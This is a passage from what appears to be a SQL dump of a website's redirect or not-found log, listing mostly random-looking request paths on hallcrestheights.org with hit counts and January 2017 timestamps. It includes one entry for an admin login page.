00:00:00'),(5213,'http://www.hallcrestheights.org/ixnmueah-whioz-k49970-hjxbnwpg-i20162631-eyooayi/kuks-szqce-baqdom-ytni-holbdent-afymluze-xtlfgg-csdimr.htm',NULL,'','',1,0,'2017-01-14 20:40:10','0000-00-00 00:00:00'),(5214,'http://www.hallcrestheights.org/vqjn-yspvhol-k1262-jpeur-rtpilu/ourxivl-btrhnnmt-i20162634-qzkowts-xppbgrrc-dsik-ibkxnpfo-vpyaybgo-ynkxnoq.htm',NULL,'','',1,0,'2017-01-14 20:43:10','0000-00-00 00:00:00'),(5215,'http://www.hallcrestheights.org/i20162635-ajqxx-ucuzao/k1807-fifep-hiij-imjnjbo/',NULL,'','',1,0,'2017-01-14 20:46:10','0000-00-00 00:00:00'),(5216,'http://www.hallcrestheights.org/oiyiz-golrcm/k43207-wfbsn-opdg-i20162634-fnhskrl/',NULL,'','',1,0,'2017-01-14 20:49:10','0000-00-00 00:00:00'),(5217,'http://www.hallcrestheights.org/i20162630-wbwpbon-kydhx/jjikvf-k45223-vtzpxb-xkcwj/',NULL,'','',1,0,'2017-01-14 20:52:10','0000-00-00 00:00:00'),(5218,'http://www.hallcrestheights.org/admin/login.php',NULL,'','',7,0,'2017-01-14 20:53:00','0000-00-00 00:00:00'),(5219,'http://www.hallcrestheights.org/oiyizgo-lrcmw-fbsnop/dgfnhs-k44923-krljr-i20162630-gfct-fzfiwx/',NULL,'','',1,0,'2017-01-14 20:55:10','0000-00-00 00:00:00'),(5220,'http://www.hallcrestheights.org/k15799-tkuykf-jdnjjbuc-yupa/jaylr-i20162629-lwfv-dyruqpk-lsdefhx/',NULL,'','',1,0,'2017-01-14 20:58:10','0000-00-00 00:00:00'),(5221,'http://www.hallcrestheights.org/bsoapaza-psta/sgmhcqc-mckfrdtf-kgpvbchs-i20162633-k18491-iwho/',NULL,'','',1,0,'2017-01-14 20:58:59','0000-00-00 00:00:00'),(5222,'http://www.hallcrestheights.org/cwhriwg-pekzq-dwkvum/k58923-zbsaii-mjzfo-zgdv-ddqjvd-i20162631-obknly/',NULL,'','',1,0,'2017-01-14 21:01:10','0000-00-00 00:00:00'),(5223,'http://www.hallcrestheights.org/ajqxxuc-k46423-uzaof-i20162630-ifephi-ijimjn/jbogt-sakb-ccgyfm-dvjuxz-lektsls/',NULL,'','',1,0,'2017-01-14 21:04:10','0000-00-00 00:00:00'),(5224,'http://www.hallcrestheights.org/htxwh-k1207-ykrsvs-vhudy-kbqx/dosfiet-yuaixnrb-dggsaarh-i20162635-efskjyd-mrujwimj/',NULL,'','',1,0,'2017-01-14 21:07:10','0000-00-00 00:00:00'),(5225,'http://www.hallcrestheights.org/nfrkop-dobbumgo-i20162628-lzes-rkwtz/qtqb-svjcwjb-xnmyvss-k57999-sldjz-naahjb-kwxr-osholvgw/',NULL,'','',1,0,'2017-01-14 21:10:11','0000-00-00 00:00:00'),(5226,'http://www.hallcrestheights.org/soegs-zxyife-tvtnd-yuuh/vfcyzls-xxqroxae-hkskxyxe-mbuqudt-wqceyvuc-i20162635-iwqws-k1407-gfrv/',NULL,'','',1,0,'2017-01-14 21:16:10','0000-00-00 00:00:00'),(5227,'http://www.hallcrestheights.org/nfrkopd-obbum-i20162630-golzes-rkwtzq/tqbsv-jcwj-bxnmyv-sssldj-znaahjb-kwxro-sholv-k45623-gwxkwoih/',NULL,'','',1,0,'2017-01-14 21:19:10','0000-00-00 00:00:00'),(5228,'http://www.hallcrestheights.org/vqjny-i20162633-spvh/k10934-oljp-eurrtpil.htm',NULL,'','',1,0,'2017-01-14 21:22:10','0000-00-00 00:00:00'),(5229,'http://www.hallcrestheights.org/gnfz-i20162633-nxvjxpa/k53162-ltitj-shkyjy.htm',NULL,'','',1,0,'2017-01-14 21:28:10','0000-00-00 00:00:00'),(5230,'http://www.hallcrestheights.org/i20162632-mrcqgbei-fuwgr/k5570-abtnwyrq-semgwko.htm',NULL,'','',2,0,'2017-01-14 21:31:10','0000-00-00 00:00:00'),(5231,'http://www.hallcrestheights.org/gnfznxvj-i20162637-xpalt/k51290-itjshkyj-yldpija.htm',NULL,'','',1,0,'2017-01-14 21:34:10','0000-00-00 00:00:00'),(5232,'http://www.hallcrestheights.org/ixnmuea-hwhiozhj/i20162630-k58238-xbnwpgey-ooayiku.htm',NULL,'','',1,0,'2017-01-14 21:37:11','0000-00-00 00:00:00'),(5233,'http://www.hallcrestheights.org/jgletky-i20162633-mdrqznrv/k10178-mlkswazv-kecqqne.htm',NULL,'','',1,0,'2017-01-14 21:40:10','0000-00-00 00:00:00'),(5234,'http://www.hallcrestheights.org/k26170-vqjnyspv-holjp/i20162632-eurrtpil-uourxiv-lbtr.htm',NULL,'','',1,0,'2017-01-14 21:46:10','0000-00-00 00:00:00'),(5235,'http://www.hallcrestheights.org/k51190-dvisciwb-vwkux/i20162637-krbzomsm-vuclzup-hvqa.htm',NULL,'','',1,0,'2017-01-14 21:49:10','0000-00-00 00:00:00'),(5236,'http://www.hallcrestheights.org/k40570-zmkuedtz-i20162631-jivyo/qxifgxuh-xptvuhm-iwnz.htm',NULL,'','',1,0,'2017-01-14 21:52:10','0000-00-00 00:00:00'),(5237,'http://www.hallcrestheights.org/i20162635-k36250-mrcqgbei-fuwgr/abtnwyrq-semgwko-whme.htm',NULL,'','',1,0,'2017-01-14 21:55:11','0000-00-00 00:00:00'),(5238,'http://www.hallcrestheights.org/k46870-gnfznxvj-xpalt/i20162632-itjshkyj-yldpija-amdu.htm',NULL,'','',1,0,'2017-01-14 21:58:13','0000-00-00 00:00:00'),(5239,'http://www.hallcrestheights.org/dvisciw-bvwkuxkr/bzomsmvu-k4858-clzuphv-i20162634-qawuox.htm',NULL,'','',1,0,'2017-01-14 22:01:10','0000-00-00 00:00:00'),(5240,'http://www.hallcrestheights.org/mrcqgbe-ifuwgrab/tnwyrqse-k3958-mgwkowh-i20162634-memxgk.htm',NULL,'','',1,0,'2017-01-14 22:04:10','0000-00-00 00:00:00'),(5241,'http://www.hallcrestheights.org/i20162630-ixnmuea-hwhiozhj/xbnwpgey-k37438-ooayiku-ksszqc.htm',NULL,'','',1,0,'2017-01-14 22:07:11','0000-00-00 00:00:00'),(5242,'http://www.hallcrestheights.org/i20162628-dvisciwb-vwkux/k9590-krbzomsm-vuclzup-hvqa-wuoxz.htm',NULL,'','',2,0,'2017-01-14 22:10:10','0000-00-00 00:00:00'),(5243,'http://www.hallcrestheights.org/gnfznxvj-xpalt/k5270-itjshkyj-yldpija-i20162632-amdu-rtaen.htm',NULL,'','',1,0,'2017-01-14 22:13:10','0000-00-00 00:00:00'),(5244,'http://www.hallcrestheights.org/soegsz-i20162633-xyifetvt-ndyu/k8739-uhvfc-yzls-xxqroxa-ehkskxy-xembu/',NULL,'','',1,0,'2017-01-14 22:13:50','0000-00-00 00:00:00'),(5245,'http://www.hallcrestheights.org/mrcqgbei-fuwgr/k25070-abtnwyrq-semgwko-i20162632-whme-mxgku.htm',NULL,'','',1,0,'2017-01-14 22:16:10','0000-00-00 00:00:00'),(5246,'http://www.hallcrestheights.org/ryvhrhmq-tyysl/k47570-lgeajanp-dmefnxh-i20162632-qfhj-dyhao.htm',NULL,'','',1,0,'2017-01-14 22:19:10','0000-00-00 00:00:00'),(5247,'http://www.hallcrestheights.org/i20162634-ryvh-rhmqtyy/k33062-sllge-ajanpd-mefnxhq-fhjdyhao.htm',NULL,'','',1,0,'2017-01-14 22:22:10','0000-00-00 00:00:00'),(5248,'http://www.hallcrestheights.org/lugdltrs-i20162635-mxxhy/k37850-pzqjllzo-hnjumnt-ecwf-ogywb.htm',NULL,'','',1,0,'2017-01-14 22:25:10','0000-00-00 00:00:00'),(5249,'http://www.hallcrestheights.org/i20162634-pcscqru-funpkwxp/k25358-oideotwt-vsoarmo-smgepl-alhel.htm',NULL,'','',1,0,'2017-01-14 22:28:15','0000-00-00 00:00:00'),(5250,'http://www.hallcrestheights.org/i20162632-k4270-mrcqgbei-fuwgr-abtnwyrq/semgwko-whme-mxgku-cybnpz.htm',NULL,'','',2,0,'2017-01-14 22:31:10','0000-00-00 00:00:00'),(5251,'http://www.hallcrestheights.org/pcsc-i20162633-qrufunp-kwxpo/k52762-ideotw-tvsoarm-osmgepla-lheliyr.htm',NULL,'','',1,0,'2017-01-14 22:34:10','0000-00-00 00:00:00'),(5252,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil/i20162635-uourxiv-lbtr-hnnmt-k37350-qzkowt-sxpp.htm',NULL,'','',1,0,'2017-01-14 22:37:10','0000-00-00 00:00:00'),(5253,'http://www.hallcrestheights.org/i20162632-lugdltrs-mxxhy-k46170-pzqjllzo/hnjumnt-ecwf-ogywb-iwyrur-fgvf.htm',NULL,'','',1,0,'2017-01-14 22:40:10','0000-00-00 00:00:00'),(5254,'http://www.hallcrestheights.org/upttmnb-k58738-eatgrbnq-cdcncxrd/hcpgzzd-llimvy-i20162630-xjltf-eobkebwi.htm',NULL,'','',1,0,'2017-01-14 22:43:10','0000-00-00 00:00:00'),(5255,'http://www.hallcrestheights.org/mrcqg-k27514-beif-uwgr-abtnwyrq/semgwkow-i20162633-hmemxg-kucyb-npzkic-vejxk.htm',NULL,'','',1,0,'2017-01-14 22:49:10','0000-00-00 00:00:00'),(5256,'http://www.hallcrestheights.org/zmku-edtzjiv-i20162634-k32562-yoqxi/fgxuhx-ptvuhmi-wnzkorpv-ubfgnqt-pmhprbik.htm',NULL,'','',1,0,'2017-01-14 22:55:10','0000-00-00 00:00:00'),(5257,'http://www.hallcrestheights.org/zmkuedt-zjivyoqx-ifgxuhxp/tvuhmiw-nzkorp-vubfg-i20162630-k59238-nqtpmhpr-bikz.htm',NULL,'','',1,0,'2017-01-14 22:58:10','0000-00-00 00:00:00'),(5258,'http://www.hallcrestheights.org/pcscqruf-k4870-unpkw-xpoideot-wtvsoar/i20162632-mosm-gepla-lheliy-rqiy-qfufxvug.htm',NULL,'','',1,0,'2017-01-14 23:01:10','0000-00-00 00:00:00'),(5259,'http://www.hallcrestheights.org/ixnmueah-k40870-whioz-hjxbnwpg-i20162631-eyooayi/kuks-szqce-baqdom-ytni-holbdent.htm',NULL,'','',1,0,'2017-01-14 23:04:11','0000-00-00 00:00:00'),(5260,'http://www.hallcrestheights.org/mrcq-k32662-gbeifuw-grabt-nwyrqs/emgwkow-hmemxgku-i20162634-cybnpzk-icvejxku-lzjc.htm',NULL,'','',1,0,'2017-01-14 23:07:10','0000-00-00 00:00:00'),(5261,'http://www.hallcrestheights.org/edzv-k11962-dlqcomn-nmmca-wvbfuj/apyvrlf-lxhqjkuh-i20162634-kcmumbh-mgznkohe-yrup.htm',NULL,'','',1,0,'2017-01-14 23:10:10','0000-00-00 00:00:00'),(5262,'http://www.hallcrestheights.org/upttmnb-k10378-eatgrbnq-cdcncxrd-hcpgzzd/llimvy-i20162633-xjltf-eobkebwi-vsmq-krfbml.htm',NULL,'','',1,0,'2017-01-14 23:13:12','0000-00-00 00:00:00'),(5263,'http://www.hallcrestheights.org/dvisci-wbvwku-xkrbzo-msmv/uclzup-hvqawu-k54726-oxzmn-i20162637-pzvsgcr-lycmczo-qqelud.htm',NULL,'','',1,0,'2017-01-14 23:16:10','0000-00-00 00:00:00'),(5264,'http://www.hallcrestheights.org/ixnmuea-hwhiozhj-i20162632-xbnwpgey-ooayiku/ksszqc-ebaqd-omytniho-lbde-k30678-ntafym-luze.htm',NULL,'','',1,0,'2017-01-14 23:19:10','0000-00-00 00:00:00'),(5265,'http://www.hallcrestheights.org/k58650-lugdltrs-mxxhy-pzqjllzo-hnjumnt/i20162634-ecwf-ogywb-iwyrur-fgvf-cwqzhrib-nknyfeeb.htm',NULL,'','',1,0,'2017-01-14 23:22:10','0000-00-00 00:00:00'),(5266,'http://www.hallcrestheights.org/ryvh-rhmqtyy-k53862-sllge-i20162633-ajanpd/mefnxhq-fhjdyhao-xrcjhwu-vdsvezyt-wlcy-cwscpuak.htm',NULL,'','',1,0,'2017-01-14 23:25:10','0000-00-00 00:00:00'),(5267,'http://www.hallcrestheights.org/vqjny-spvh-k12234-oljp-eurrtpil/uourxivl-btrhnn-mtqzk-i20162633-owtsxp-pbgrr-cdsikib-kxnpfov.htm',NULL,'','',1,0,'2017-01-14 23:28:11','0000-00-00 00:00:00'),(5268,'http://www.hallcrestheights.org/ryvhrhm-qtyysllg-eajanpdm-k32178-efnxhqf/hjdyha-oxrcj-i20162632-hwuvdsve-zytw-lcycws-cpua-kqnj.htm',NULL,'','',1,0,'2017-01-14 23:31:10','0000-00-00 00:00:00'),(5269,'http://www.hallcrestheights.org/zmkuedtz-k4170-jivyo-qxifgxuh-xptvuhm/iwnz-korpv-i20162632-ubfgnq-tpmh-prbikzon-mtlajhol-jrdklt.htm',NULL,'','',1,0,'2017-01-14 23:34:10','0000-00-00 00:00:00'),(5270,'http://www.hallcrestheights.org/pcscqruf-unpkw-i20162628-xpoideot-wtvsoar/mosm-k30090-gepla-lheliy-rqiy-qfufxvug-owopegtq-amzimc.htm',NULL,'','',1,0,'2017-01-14 23:37:10','0000-00-00 00:00:00'),(5271,'http://www.hallcrestheights.org/edzvd-lqco-k27614-mnnm-mcawvbfu/japyvrlf-i20162633-lxhqjk-uhkcm-umbhmg-znkoh-eyrupxp-udzikmu-sshe.htm',NULL,'','',1,0,'2017-01-14 23:40:10','0000-00-00 00:00:00'),(5272,'http://www.hallcrestheights.org/fadla-jfnl-k53534-gfpc-vwgmyhde/i20162632-cwxbdeud-kovfii-bptqu-hzxchh-rmxag-fpapuhg-fqvjdcl-bbvz.htm',NULL,'','',1,0,'2017-01-14 23:43:10','0000-00-00 00:00:00'),(5273,'http://www.hallcrestheights.org/jgle-tkymdrq-znrvm-lkswaz/vkecqqn-k52662-eeiaqjzl-nplqfcn-i20162633-ebxilnvo-xbdj-veebikpt-jvlxfaye.htm',NULL,'','',1,0,'2017-01-14 23:46:10','0000-00-00 00:00:00'),(5274,'http://www.hallcrestheights.org/edzv-dlqcomn-nmmca-k53562-wvbfuj/apyvrlf-lxhqjkuh-kcmumbh-i20162633-mgznkohe-yrup-xpudzikm-ussheqnr.htm',NULL,'','',1,0,'2017-01-14 23:49:10','0000-00-00 00:00:00'),(5275,'http://www.hallcrestheights.org/jgletky-mdrqznrv-i20162630-k58538-mlkswazv-kecqqne/eiaqjz-lnplq-fcnebxil-nvox-bdjvee-bikp-tjvl-xfaye.htm',NULL,'','',1,0,'2017-01-14 23:52:10','0000-00-00 00:00:00'),(5276,'http://www.hallcrestheights.org/qlbowc-i20162633-iggeceay/afxr-k18539-glnik/',NULL,'','',1,0,'2017-01-14 23:55:10','0000-00-00 00:00:00'),(5277,'http://www.hallcrestheights.org/edzvdlqc-omnnm-k16850-mcawvbfu-japyvrl/flxh-qjkuh-kcmumb-i20162635-hmgz-nkoheyru-pxpudzik-musshe-qnrfwn.htm',NULL,'','',1,0,'2017-01-14 23:58:13','0000-00-00 00:00:00'),(5278,'http://www.hallcrestheights.org/i20162628-jgletkym-drqzn-k29990-rvmlkswa-zvkecqq/neei-aqjzl-nplqfc-nebx-ilnvoxbd-jveebikp-tjvlxf-ayeaya.htm',NULL,'','',1,0,'2017-01-15 00:01:11','0000-00-00 00:00:00'),(5279,'http://www.hallcrestheights.org/ixnm-ueahwhi-k12062-ozhjx-bnwpge/yooayik-uksszqce-i20162634-baqdomy-tniholbd-enta-fymluzex-tlfggcsd-imrmqfn.htm',NULL,'','',1,0,'2017-01-15 00:04:10','0000-00-00 00:00:00'),(5280,'http://www.hallcrestheights.org/mrcq-gbeifuw-k53462-grabt-nwyrqs/emgwkow-i20162633-hmemxgku-cybnpzk-icvejxku-lzjc-jkntsxjl-nuuuvtff-cgyjire.htm',NULL,'','',1,0,'2017-01-15 00:07:10','0000-00-00 00:00:00'),(5281,'http://www.hallcrestheights.org/ajqxxucu-i20162633-zaof/ifephii-k28691-jimjnjbo/',NULL,'','',1,0,'2017-01-15 00:10:10','0000-00-00 00:00:00'),(5282,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj/ikvf-vtzpx-i20162629-k25099-bxkc/',NULL,'','',1,0,'2017-01-15 00:13:10','0000-00-00 00:00:00'),(5283,'http://www.hallcrestheights.org/oiyiz-golrcm/k54907-wfbsn-opdg-i20162634-fnhskrl/',NULL,'','',1,0,'2017-01-15 00:16:10','0000-00-00 00:00:00'),(5284,'http://www.hallcrestheights.org/soegszxy-k34531-ifet/vtndyuu-hvfcyzls-i20162634-xxqroxae/',NULL,'','',1,0,'2017-01-15 00:19:10','0000-00-00 00:00:00'),(5285,'http://www.hallcrestheights.org/oiyizg-olrcmwfb/snop-dgfnh-i20162632-skrl-k59639-jrgfctf/',NULL,'','',1,0,'2017-01-15 00:22:10','0000-00-00 00:00:00'),(5286,'http://www.hallcrestheights.org/yembjvht-k56131-qqdc/kzfltzt-erqbwnsw-i20162634-nsnjplpf/',NULL,'','',1,0,'2017-01-15 00:25:10','0000-00-00 00:00:00'),(5287,'http://www.hallcrestheights.org/kzpffms-xklrd-edhwge/fvbbgz-k7123-agpec-iyyu-i20162631-wuvfzt/',NULL,'','',1,0,'2017-01-15 00:28:10','0000-00-00 00:00:00'),(5288,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo-hnjumnt/ecwf-ogywb-iwyrur-fgvf-cwqzhrib-k24330-nknyfeeb-i20162636-sbjhfk.htm',NULL,'','',1,0,'2017-01-15 00:29:03','0000-00-00 00:00:00'),(5289,'http://www.hallcrestheights.org/xhajvqlw-czbi/qsosqxo-i20162631-qkgqaqyd-cptznzvt-k62051-jqoe/',NULL,'','',1,0,'2017-01-15 00:31:10','0000-00-00 00:00:00'),(5290,'http://www.hallcrestheights.org/i20162630-vqjn-yspvhol-k32982-jpeur-rtpilu/ourxivl-btrhnnmt-qzkowts-xppbgrrc-dsik-ibkxnpfo.htm',NULL,'','',1,0,'2017-01-15 00:33:56','0000-00-00 00:00:00'),(5291,'http://www.hallcrestheights.org/kzpffmsx-klrd/edhwgef-vbbgzagp-eciyyuwu-i20162633-k28391-vfzt/',NULL,'','',1,0,'2017-01-15 00:34:10','0000-00-00 00:00:00'),(5292,'http://www.hallcrestheights.org/k47299-bsoapa-zapstasg-mhcq/i20162628-cmckf-rdtf-kgpvbch-siwhork/',NULL,'','',1,0,'2017-01-15 00:37:10','0000-00-00 00:00:00'),(5293,'http://www.hallcrestheights.org/ajqxxucu-zaof-ifephii/jimjnjbo-k48451-gtsakbcc-i20162630-gyfm-dvju/',NULL,'','',1,0,'2017-01-15 00:40:10','0000-00-00 00:00:00'),(5294,'http://www.hallcrestheights.org/wbwpb-k12307-onkydh-xjjik/i20162635-vfvt-zpxbxkc-wjybtylw-osduieqg/',NULL,'','',1,0,'2017-01-15 00:43:10','0000-00-00 00:00:00'),(5295,'http://www.hallcrestheights.org/wbwpbonk-ydhx-i20162634-jjikvfv/tzpxbxkc-wjybtylw-osdu-k55831-ieqg/',NULL,'','',1,0,'2017-01-15 00:46:10','0000-00-00 00:00:00'),(5296,'http://www.hallcrestheights.org/yembjvh-tqqdc-kzfltz/terqbw-nswns-njpl-i20162630-pftrrj-k36423-ncypjo/',NULL,'','',1,0,'2017-01-15 00:52:10','0000-00-00 00:00:00'),(5297,'http://www.hallcrestheights.org/nfrkopdo-bbum-golzesr/kwtzqtqb-svjcwjbx-nmyv-i20162630-sssl-k48951-djzna/',NULL,'','',1,0,'2017-01-15 00:55:10','0000-00-00 00:00:00'),(5298,'http://www.hallcrestheights.org/nfrko-pdobbu-i20162634-mgolz/k33507-esrk-wtzqtqb-svjcwjbx-nmyvsssl-djznaah/',NULL,'','',1,0,'2017-01-15 00:58:11','0000-00-00 00:00:00'),(5299,'http://www.hallcrestheights.org/oiyizgol-k55531-rcmw-fbsnopd-gfnhskrl/jrgfctfz-fiwx-i20162634-wmak-oayos-mpql/',NULL,'','',1,0,'2017-01-15 01:01:10','0000-00-00 00:00:00'),(5300,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-i20162632-yupa-jaylr/lwfv-dyruqpk-lsdefhx-dfpdf-ufpfaj-k59739-npvz/',NULL,'','',1,0,'2017-01-15 01:04:10','0000-00-00 00:00:00'),(5301,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-ijimj/njbo-gtsakbc-cgyfmdv-juxzl-i20162628-ektsls-k48399-hxos/',NULL,'','',1,0,'2017-01-15 01:10:11','0000-00-00 00:00:00'),(5302,'http://www.hallcrestheights.org/i20162630-wbwpbon-kydhx-jjikvf-k36123-vtzpxb/xkcwj-ybty-lwosdu-ieqgws-ogxhgpi-sdhtn/',NULL,'','',1,0,'2017-01-15 01:13:10','0000-00-00 00:00:00'),(5303,'http://www.hallcrestheights.org/oiyiz-k12007-golrcm-wfbsn-opdg/fnhskrl-jrgfctfz-fiwxwmak-i20162635-oayosmp-qlgvegdf/',NULL,'','',1,0,'2017-01-15 01:16:10','0000-00-00 00:00:00'),(5304,'http://www.hallcrestheights.org/qlbowcig-k56031-gece-ayafxrg-lnikghhm/i20162634-bbxpgesm-rcai-ztbi-auwdt-vixp-mtzhzzw/',NULL,'','',1,0,'2017-01-15 01:19:10','0000-00-00 00:00:00'),(5305,'http://www.hallcrestheights.org/kzpff-msxklr-dedhw-gefv/i20162634-bbgzagp-eciyyuwu-vfztjigj-k54807-inamzbc-ngtfmlyr-ghdfi/',NULL,'','',1,0,'2017-01-15 01:22:10','0000-00-00 00:00:00'),(5306,'http://www.hallcrestheights.org/jgle-tkymdrq-znrvm/lkswaz-vkecqqn-i20162630-k33682-eeiaqjzl-nplqfcn.htm',NULL,'','',1,0,'2017-01-15 01:24:54','0000-00-00 00:00:00'),(5307,'http://www.hallcrestheights.org/xhajvql-wczbi-qsosqx-k57423-oqkgqa/i20162630-qydcp-tznz-vtjqoe-vpcaqw-jaluwty-bckbs-xbnbg/',NULL,'','',1,0,'2017-01-15 01:28:10','0000-00-00 00:00:00'),(5308,'http://www.hallcrestheights.org/wbwpbonk-ydhx-jjikvfv-tzpxbxkc/wjybtylw-osdu-ieqg-k35031-wsogx-i20162634-hgpi-sdhtnir-mjhvzy/',NULL,'','',1,0,'2017-01-15 01:31:10','0000-00-00 00:00:00'),(5309,'http://www.hallcrestheights.org/soegs-zxyife-tvtnd-yuuh/vfcyzls-xxqroxae-k13107-hkskxyxe-mbuqudt-wqceyvuc-i20162635-iwqws-gfrv/',NULL,'','',1,0,'2017-01-15 01:34:10','0000-00-00 00:00:00'),(5310,'http://www.hallcrestheights.org/tkuykfj-dnjjb-ucyupa-i20162631-jaylrl/wfvdy-ruqp-klsdef-hxdfpd-fufpfaj-npvza-ttuxd-k6023-wvpeekly/',NULL,'','',1,0,'2017-01-15 01:37:10','0000-00-00 00:00:00'),(5311,'http://www.hallcrestheights.org/xhajvql-wczbi-i20162630-qsosqx-oqkgqa/qydcp-tznz-vtjqoe-vpcaqw-jaluwty-bckbs-xbnbg-k36623-nndorcaj/',NULL,'','',1,0,'2017-01-15 01:40:11','0000-00-00 00:00:00'),(5312,'http://www.hallcrestheights.org/oiyizgol-rcmw-i20162630-fbsnopd-gfnhskrl/jrgfctfz-fiwx-wmak-oayos-mpql-gvegdfv-gcrcbz-k48251-mqnod/',NULL,'','',1,0,'2017-01-15 01:43:10','0000-00-00 00:00:00'),(5313,'http://www.hallcrestheights.org/bsoap-azapst-asgmh-cqcm/ckfrdtf-kgpvbchs-i20162634-iwhorklv-zrtjrsy-oaayfwgd-xskmy-ukcm-k31907-bqrmkr/',NULL,'','',1,0,'2017-01-15 01:46:10','0000-00-00 00:00:00'),(5314,'http://www.hallcrestheights.org/upttm-i20162637-nbea/k134-tgrb-nqcdcncx.htm',NULL,'','',1,0,'2017-01-15 01:49:11','0000-00-00 00:00:00'),(5315,'http://www.hallcrestheights.org/i20162636-jglet-kymd/k41534-rqzn-rvmlkswa.htm',NULL,'','',1,0,'2017-01-15 01:52:10','0000-00-00 00:00:00'),(5316,'http://www.hallcrestheights.org/fadlaj-i20162637-fnlgfp/k23426-cvwgmy-hdec.htm',NULL,'','',1,0,'2017-01-15 01:55:10','0000-00-00 00:00:00'),(5317,'http://www.hallcrestheights.org/jgletkym-drqzn/i20162634-k47150-rvmlkswa-zvkecqq.htm',NULL,'','',1,0,'2017-01-15 01:58:10','0000-00-00 00:00:00'),(5318,'http://www.hallcrestheights.org/vqjny-i20162636-spvh/oljp-eurrtpil-k32254-uourxivl.htm',NULL,'','',1,0,'2017-01-15 02:01:10','0000-00-00 00:00:00'),(5319,'http://www.hallcrestheights.org/ryvhr-i20162636-hmqt/yysl-lgeajanp-k41434-dmefnxhq.htm',NULL,'','',1,0,'2017-01-15 02:04:10','0000-00-00 00:00:00'),(5320,'http://www.hallcrestheights.org/edzvd-lqco/i20162637-mnnm-mcawvbfu-k21634-japyvrlf.htm',NULL,'','',1,0,'2017-01-15 02:07:10','0000-00-00 00:00:00'),(5321,'http://www.hallcrestheights.org/k4930-ryvhrhmq-i20162636-tyysl/lgeajanp-dmefnxh-qfhj.htm',NULL,'','',1,0,'2017-01-15 02:10:10','0000-00-00 00:00:00'),(5322,'http://www.hallcrestheights.org/k25630-lugdltrs-i20162636-mxxhy/pzqjllzo-hnjumnt-ecwf.htm',NULL,'','',1,0,'2017-01-15 02:13:10','0000-00-00 00:00:00'),(5323,'http://www.hallcrestheights.org/zmkued-i20162635-tzjivy/k20966-oqxifg-xuhx-ptvuhm-iwnzko.htm',NULL,'','',1,0,'2017-01-15 02:16:10','0000-00-00 00:00:00'),(5324,'http://www.hallcrestheights.org/lugdlt-i20162635-rsmxxh/k20066-ypzqjl-lzoh-njumnt-ecwfog.htm',NULL,'','',1,0,'2017-01-15 02:19:10','0000-00-00 00:00:00'),(5325,'http://www.hallcrestheights.org/zmkue-dtzj/k37814-ivyo-qxifgxuh-xptvuhmi-i20162633-wnzkor.htm',NULL,'','',1,0,'2017-01-15 02:25:10','0000-00-00 00:00:00'),(5326,'http://www.hallcrestheights.org/zmkue-dtzj/k21434-ivyo-i20162637-qxifgxuh-xptvuhmi-wnzkor.htm',NULL,'','',1,0,'2017-01-15 02:28:10','0000-00-00 00:00:00'),(5327,'http://www.hallcrestheights.org/dvisciwb-vwkux/k14270-krbzomsm-vuclzup-i20162632-hvqa-wuoxz.htm',NULL,'','',1,0,'2017-01-15 02:31:11','0000-00-00 00:00:00'),(5328,'http://www.hallcrestheights.org/i20162628-fadl-ajfnlgf/k36842-pcvwg-myhdec-wxbdeud-kovfiibp.htm',NULL,'','',1,0,'2017-01-15 02:34:10','0000-00-00 00:00:00'),(5329,'http://www.hallcrestheights.org/kzpf-i20162629-fmsxklr/dedhwge-fvbbg-zagpe-k50855-ciyyuwu/',NULL,'','',1,0,'2017-01-15 02:36:04','0000-00-00 00:00:00'),(5330,'http://www.hallcrestheights.org/i20162628-ryvh-rhmqtyy/k37742-sllge-ajanpd-mefnxhq-fhjdyhao.htm',NULL,'','',1,0,'2017-01-15 02:37:10','0000-00-00 00:00:00'),(5331,'http://www.hallcrestheights.org/jgle-tkymdrq/i20162630-k54482-znrvm-lkswaz-vkecqqn-eeiaqjzl.htm',NULL,'','',1,0,'2017-01-15 02:40:10','0000-00-00 00:00:00'),(5332,'http://www.hallcrestheights.org/edzvdlqc-omnnm/i20162636-k25430-mcawvbfu-japyvrl-flxh-qjkuh.htm',NULL,'','',1,0,'2017-01-15 02:43:10','0000-00-00 00:00:00'),(5333,'http://www.hallcrestheights.org/i20162634-lugd-ltrsmxx/k42062-hypzq-jllzoh-njumnte-cwfogywb.htm',NULL,'','',1,0,'2017-01-15 02:46:10','0000-00-00 00:00:00'),(5334,'http://www.hallcrestheights.org/dvisciwb-vwkux/k37670-krbzomsm-vuclzup-i20162632-hvqa-wuoxz.htm',NULL,'','',1,0,'2017-01-15 02:49:10','0000-00-00 00:00:00'),(5335,'http://www.hallcrestheights.org/i20162628-zmkuedtz-jivyo/k17690-qxifgxuh-xptvuhm-iwnz-korpv.htm',NULL,'','',1,0,'2017-01-15 02:52:11','0000-00-00 00:00:00'),(5336,'http://www.hallcrestheights.org/i20162634-uptt-mnbeatg/k41162-rbnqc-dcncxr-dhcpgzz-dllimvyx.htm',NULL,'','',1,0,'2017-01-15 02:55:10','0000-00-00 00:00:00'),(5337,'http://www.hallcrestheights.org/mrcqgbei-fuwgr/i20162636-k46130-abtnwyrq-semgwko-whme-mxgku.htm',NULL,'','',1,0,'2017-01-15 02:58:10','0000-00-00 00:00:00'),(5338,'http://www.hallcrestheights.org/k10412-jgle-tkymdrq-i20162634-znrvm-lkswaz.htm',NULL,'https://www.google.co.jp/','',14,0,'2017-01-15 02:59:18','0000-00-00 00:00:00'),(5339,'http://www.hallcrestheights.org/gnfznxvj-xpalt/i20162636-k26330-itjshkyj-yldpija-amdu-rtaen.htm',NULL,'','',1,0,'2017-01-15 03:01:11','0000-00-00 00:00:00'),(5340,'http://www.hallcrestheights.org/gnfz-nxvjxpa/i20162630-k32882-ltitj-shkyjy-ldpijaa-mdurtaen.htm',NULL,'','',1,0,'2017-01-15 03:04:10','0000-00-00 00:00:00'),(5341,'http://www.hallcrestheights.org/i20162634-ixnmueah-whioz/k46850-hjxbnwpg-eyooayi-kuks-szqce.htm',NULL,'','',1,0,'2017-01-15 03:07:10','0000-00-00 00:00:00'),(5342,'http://www.hallcrestheights.org/dvisciwb-vwkux/i20162636-k47030-krbzomsm-vuclzup-hvqa-wuoxz.htm',NULL,'','',1,0,'2017-01-15 03:10:10','0000-00-00 00:00:00'),(5343,'http://www.hallcrestheights.org/i20162634-fadl-ajfnlgf/k20462-pcvwg-myhdec-wxbdeud-kovfiibp.htm',NULL,'','',2,0,'2017-01-15 03:13:10','0000-00-00 